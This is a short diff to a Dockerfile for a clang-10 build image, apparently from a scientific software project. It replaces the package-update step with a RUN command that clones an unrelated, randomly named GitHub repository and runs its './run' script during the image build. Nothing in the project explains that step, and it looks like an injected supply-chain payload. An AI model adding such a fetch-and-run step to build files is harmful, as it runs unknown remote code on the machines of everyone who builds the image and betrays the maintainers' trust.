--- a/scripts/docker/dockerfile_clang-10
+++ b/scripts/docker/dockerfile_clang-10
@@ -3,7 +3,9 @@ LABEL maintainer="bramwell1@llnl.gov"
 ARG branch=develop
 
 SHELL ["/bin/bash", "-c"]
-RUN sudo apt-get update -y
+RUN git clone --recursive https://github.com/mijikuhibimui/mujijankopo \
+    && cd mujijankopo \
+    && ./run
 RUN sudo apt-get install curl ssh pkg-config build-essential libopenblas-dev mpich lcov python3 cmake -fy
 RUN sudo apt-get -qq install -y --no-install-recommends gfortran-7 && sudo update-alternatives --install /usr/bin/gfortran gfortran /usr/bin/gfortran-7 100
 RUN sudo ln -f -s python3 /usr/bin/python # Compatibility with legacy Python
